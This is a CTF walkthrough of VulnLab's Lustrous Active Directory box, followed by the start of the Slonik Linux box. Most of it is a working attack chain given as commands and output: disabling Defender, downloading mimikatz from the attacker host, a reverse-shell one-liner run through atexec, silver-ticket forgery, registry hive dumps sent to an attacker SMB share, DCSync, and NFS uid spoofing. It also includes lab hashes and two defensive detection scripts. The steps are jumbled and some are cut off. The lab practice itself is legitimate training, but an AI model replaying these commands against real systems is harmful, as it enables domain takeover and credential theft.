The command completed successfully.

Look around

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ xfreerdp  /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx

Start Edge, log in to https://lusdc.lustrous.vl as ben.cox
and find the secure note.

We also have svc_web's password, so we can forge a silver ticket for the http/lusdc service as any user we like. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets

We disable Windows Defender and upload mimikatz in our current PowerShell session, where the forged ticket will be injected:

set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe

Then we generate a PowerShell reverse-shell one-liner with mkpsrevshell.py and run it as Administrator via atexec:

python3 mkpsrevshell.py 10.8.2.138 443

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e 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"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
Password:
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp


All in one: purge the cache, then forge the ticket and pass it into the current session. Although mimikatz calls the module kerberos::golden, using the service account's key with /service and /target produces a silver ticket (a forged service ticket) that the DC never sees, so the group membership it claims is whatever we put in it:

PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519 
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt      
Service   : http
Target    : lusdc.lustrous.vl
Lifetime  : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

PS C:\temp> whoami
nt authority\system
PS C:\temp> hostname
LusMS
PS C:\temp> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>	Client: tony.ward @ lustrous.vl
    Server: http/lusdc.lustrous.vl @ lustrous.vl
    KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 9/21/2024 18:04:01 (local)
    End Time:   9/19/2034 18:04:01 (local)
    Renew Time: 9/19/2034 18:04:01 (local)
    Session Key Type: RSADSI RC4-HMAC(NT)
    Cache Flags: 0 
    Kdc Called: 
PS C:\temp> 

PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content


First we need the NT hash of svc_web's cracked password, since mimikatz takes the service key as /rc4:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717

The SID of tony.ward can be read with wmic (or taken from BloodHound); the domain part goes into /sid and the trailing RID (1114) into /id:

C:\Windows\system32>wmic useraccount where name='tony.ward' get sid 
SID S-1-5-21-2355092754-1584501958-1513963426-1114

The NT hash goes into the /rc4 parameter:

kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http  /ptt

and request the target website:

iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

This gives us u

We had better not use the Administrator account for this (meaning we need another target; in our case we craft the silver ticket for tony.ward, giving his RID in /id):

.

kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
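The forged ticket above is easy to spot from the defender's side: the klist output further down shows a service ticket valid for ten years, encrypted with RC4, and with no KDC recorded, none of which a real KDC under default domain policy would produce. The following is an added example (not part of this writeup or of mimikatz) that parses klist text and flags those properties. The klist sample is constructed from the output shown on this page plus one ordinary TGT for contrast; the 10 hour / 7 day policy values are the domain defaults and are assumptions for your environment.

```python
"""
Heuristic check for forged (silver/golden) Kerberos tickets in a klist dump.
Constructed sample: the injected http ticket from this writeup and a normal TGT.
"""
import re
from datetime import datetime, timedelta

SAMPLE_KLIST = """\
Current LogonId is 0:0x4900d

Cached Tickets: (2)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#1>     Client: tony.ward @ lustrous.vl
        Server: krbtgt/lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 7/27/2024 19:00:00 (local)
        End Time:   7/28/2024 5:00:00 (local)
        Renew Time: 8/3/2024 19:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: LusDC.lustrous.vl
"""

TICKET_START = re.compile(r"^#\d+>")
FIELD = re.compile(
    r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Renew Time|Kdc Called):\s*(.*)$"
)
TIME_FMT = "%m/%d/%Y %H:%M:%S"  # klist prints local time as M/D/YYYY H:MM:SS


def parse_klist(text):
    """Return one dict per cached ticket, with the three timestamps parsed."""
    tickets, current = [], None
    for line in text.splitlines():
        if TICKET_START.match(line):
            current = {}
            tickets.append(current)
            line = TICKET_START.sub("", line)  # "#0>  Client: ..." carries the first field
        if current is None:
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key.endswith("Time"):
            value = datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)
        current[key] = value
    return tickets


def assess(ticket, max_life=timedelta(hours=10), max_renew=timedelta(days=7)):
    """Compare one ticket with domain policy (defaults: 10 h service ticket, 7 d renewal).
    A KDC never issues beyond policy, so an over-long ticket was minted elsewhere."""
    findings = []
    life = ticket["End Time"] - ticket["Start Time"]
    if life > max_life:
        findings.append(f"lifetime {life} exceeds policy maximum {max_life}")
    if ticket["Renew Time"] - ticket["Start Time"] > max_renew:
        findings.append("renew-until exceeds policy maximum")
    if "RC4" in ticket.get("KerbTicket Encryption Type", ""):
        findings.append("RC4 ticket although the realm supports AES (forgeries are usually built from the NT hash)")
    if not ticket.get("Kdc Called") and not ticket["Server"].startswith("krbtgt/"):
        findings.append("no KDC recorded: the ticket was injected into the cache, not requested")
    return findings


def report(text):
    """Map each ticket's Server principal to its list of findings (empty = looks normal)."""
    return {t["Server"]: assess(t) for t in parse_klist(text)}


if __name__ == "__main__":
    for server, findings in report(SAMPLE_KLIST).items():
        print(server, "->", findings or "looks normal")
```

The same signal exists server side: the target service never contacted the KDC, so there is no Event 4769 for this ticket, and any 4769 that does show RC4 (TicketEncryptionType 0x17) for a service account that has AES keys deserves a look. The real fix is the one the box hints at: a service account with a weak password that can be converted to its NT hash.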

In an administrative cmd prompt:

C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user "lustrous\ben.cox" ...

C:\Windows\system32>

then

c:\temp>mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : http
Target    : LusDC.lustrous.vl
Lifetime  : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz # exit
Bye!

c:\temp>

.

c:\temp>klist

Current LogonId is 0:0x4900d

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content



<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>

<div class="table">
 
                                    <td>
                                        Password Reminder
                                    </td>
                                    <td>
                                        U_cPVQ<redacted>0i1X
                                    </td>
                                    <td>
                                        lustrous_tony.ward
                                    </td>
                                    <td>
                                        <a class="btn btn-danger" href="/Internal
        </table>
        <input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
    </div>
        <hr />
        <footer>
            <p>&copy; 2024 - SNotes</p>
        </footer>
    </div>
</body>
</html>

PS C:\temp>

.

PRIVESC

 

Logged in as ben.cox, right-click PowerShell and run it as user tony.ward:

PS C:\Users\ben.cox> whoami
lustrous\tony.ward

PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: -2147483648
   \_ Inherited: False

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: 268435456
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: FullControl
   \_ Inherited: False

[*] Identity: BUILTIN\Backup Operators
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
PS C:\temp>


.

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl                        

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd windows\tasks
# ls
drw-rw-rw-          0  Sat Jul 27 13:51:14 2024 .
drw-rw-rw-          0  Sat May 27 20:32:06 2023 ..
-rw-rw-rw-      45056  Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw-      28672  Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw-   16965632  Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw-          6  Sat Jul 27 11:50:13 2024 SA.DAT
# mget *
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[*] Downloading SA.DAT
# 

or do it this way

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] ..snip..
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []

.

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save

[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save

Now get the machine account hashes from the saved hives:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 

With the LUSDC$ hash, DCSync the domain user hashes (here just Administrator):

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
[*] Cleaning up... 

evil-winrm to the DC:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76'                                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
LusDC
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{53<redacted>0b}

 

.

That was fun!

vulnlab-slonik

vulnlab slonik

a medium linux box

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ mkdir extract2
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ sudo mount -t nfs 10.10.99.219: ./extract2
[sudo] password for puck: 
                                                                                                                     
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ cd extract2                                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ ls -la
total 16
drwxr-xr-x 19 root root 4096 Jul 27 09:22 .
drwxrwxr-x  3 puck puck 4096 Jul 27 09:42 ..
drwxr-xr-x  3 root root 4096 Oct 24  2023 home
drwxr-xr-x 13 root root 4096 Sep 19  2023 var
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ cd home    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ cd service
cd: permission denied: service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo usermod -u 1337 1337                 
usermod: no changes
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo su 1337             
$ bash
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ cd service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ ls -la
total 40
drwxr-x--- 5 1337 1337 4096 Oct 24  2023 .
drwxr-xr-x 3 root root 4096 Oct 24  2023 ..
-rw-rw-r-- 1 1337 1337   90 Oct 24  2023 .bash_history
-rw-r--r-- 1 1337 1337  220 Oct 24  2023 .bash_logout
-rw-r--r-- 1 1337 1337 3771 Oct 24  2023 .bashrc
drwx------ 2 1337 1337 4096 Oct 24  2023 .cache
drwxrwxr-x 3 1337 1337 4096 Oct 24  2023 .local
-rw-r--r-- 1 1337 1337  807 Oct 24  2023 .profile
-rw------- 1 1337 1337  326 Oct 24  2023 .psql_history
drwxrwxr-x 2 1337 1337 4096 Oct 24  2023 .ssh
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .psql_history
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description)VALUES ('service', 'aa<redacted>c2'WHERE', network access account');
select * from users;
\q
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .bash_history
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$
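What made the mount above work is the export itself: the whole tree is exported to any host, and with AUTH_SYS the server honours whatever uid the client presents, so a local account with uid 1337 reads the service user's home (the .psql_history with mode 0600 included). Below is an added example, not part of this writeup, that audits an /etc/exports file for exactly those conditions. The exports text is constructed; the option names (no_root_squash, all_squash, insecure, sec=) are the real ones from exports(5).

```python
"""
Audit /etc/exports for world exports, uid-trusting (AUTH_SYS) access and
root_squash being disabled. Constructed sample, not the target's real file.
"""
import re

SAMPLE_EXPORTS = """\
# constructed sample, not the slonik host's exports file
/               *(rw,sync,no_subtree_check)
/home/service   10.10.0.0/16(rw,no_root_squash,insecure)
/srv/share      backup01.example.internal(ro,all_squash,anonuid=65534,anongid=65534,sec=krb5p)
"""

CLIENT = re.compile(r"^(?P<host>[^\s(]*)(?:\((?P<opts>[^)]*)\))?$")
SYSTEM_TREES = {"/", "/etc", "/root", "/home", "/var"}


def parse_exports(text):
    """Return {path, host, opts} for every path/client pair in an exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # exports(5): '#' starts a comment
        if not line:
            continue
        path, *clients = line.split()
        if not clients:                        # a path with no client spec is exported to everyone
            clients = ["*"]
        for client in clients:
            m = CLIENT.match(client)
            host = m.group("host") or "*"      # "(opts)" with no host also means everyone
            opts = {o for o in (m.group("opts") or "").split(",") if o}
            entries.append({"path": path, "host": host, "opts": opts})
    return entries


def audit(entry):
    """Return a set of finding codes for one export entry."""
    path, host, opts = entry["path"], entry["host"], entry["opts"]
    codes = set()
    if host in ("*", "0.0.0.0/0"):
        codes.add("WORLD")             # any host on the network may mount it
    if path in SYSTEM_TREES:
        codes.add("SYSTEM_TREE")       # exporting / or a top-level system directory
    if "no_root_squash" in opts:
        codes.add("NO_ROOT_SQUASH")    # remote root stays root on the export
    if "all_squash" not in opts:
        codes.add("UID_TRUST")         # client uids are honoured: a local uid 1337 reads uid 1337's files
    if "insecure" in opts:
        codes.add("INSECURE_PORTS")    # mounts accepted from unprivileged source ports
    if not any(o.startswith("sec=") and "krb5" in o for o in opts):
        codes.add("NO_KRB5")           # sec=sys: identity is whatever the client claims
    return codes


def audit_file(text):
    """Map (path, host) to its finding codes for a whole exports file."""
    return {(e["path"], e["host"]): audit(e) for e in parse_exports(text)}


if __name__ == "__main__":
    for key, codes in audit_file(SAMPLE_EXPORTS).items():
        print(key, sorted(codes) or "ok")
```

The third entry shows the shape that defeats the uid trick: a named client, all_squash so every remote uid maps to the anonymous user, and sec=krb5p so the identity comes from a Kerberos ticket rather than from the client's own claim. Run this against `exportfs -v` output as well, since that shows the effective options after defaults are applied.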

.

crack the hash

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ john hash --format=RAW-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
se<redacted>ce          (?)     
1g 0:00:00:00 DONE 2/3 (2024-07-27 09:48) 50.00g/s 19200p/s 19200c/s 19200C/s 123456..larry
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

ssh connects but immediately disconnects

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh service@10.10.99.219              
The authenticity of host '10.10.99.219 (10.10.99.219)' can't be established.
ED25519 key fingerprint is SHA256:j/hcANass/0veF/m0NAMOR41osL5zUMMMQ9nCYiwjmY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.99.219' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@/     %@@@@@@@@@@.      @&             @@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@   ############.    ############   ##########*  &@@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###############  ###################  /##########  @@@@@@@@@@@@@ 
@@@@@@@@@@ ###############( #######################(  #########  @@@@@@@@@@@@ 
@@@@@@@@@  ############### (#########################  ######### @@@@@@@@@@@@ 
@@@@@@@@@ .##############  ###########################( #######  @@@@@@@@@@@@ 
@@@@@@@@@  ############## (        ##############        ######  @@@@@@@@@@@@ 
@@@@@@@@@. ############## #####   # .########### ##  ##  #####. @@@@@@@@@@@@@ 
@@@@@@@@@@ .############# /########  ########### *##### ###### @@@@@@@@@@@@@@ 
@@@@@@@@@@. ############# (########( ###########/ ##### ##### (@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###########( #########, ############( ####  ### (@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@ (##########/ #########  ##############  ##  #( @@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@( ###########  #######  ################  / #  @@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@  ############  ####  ###################    @@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@, ##########  @@@      ################            (@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@ .######  @@@@   ###  ##############  #######   @@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@(  *   @. #######    ############## (@((&@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%&@@@@  #############( @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #############  @@@@@@@@@@@@@@@@@@@@@@@@ 
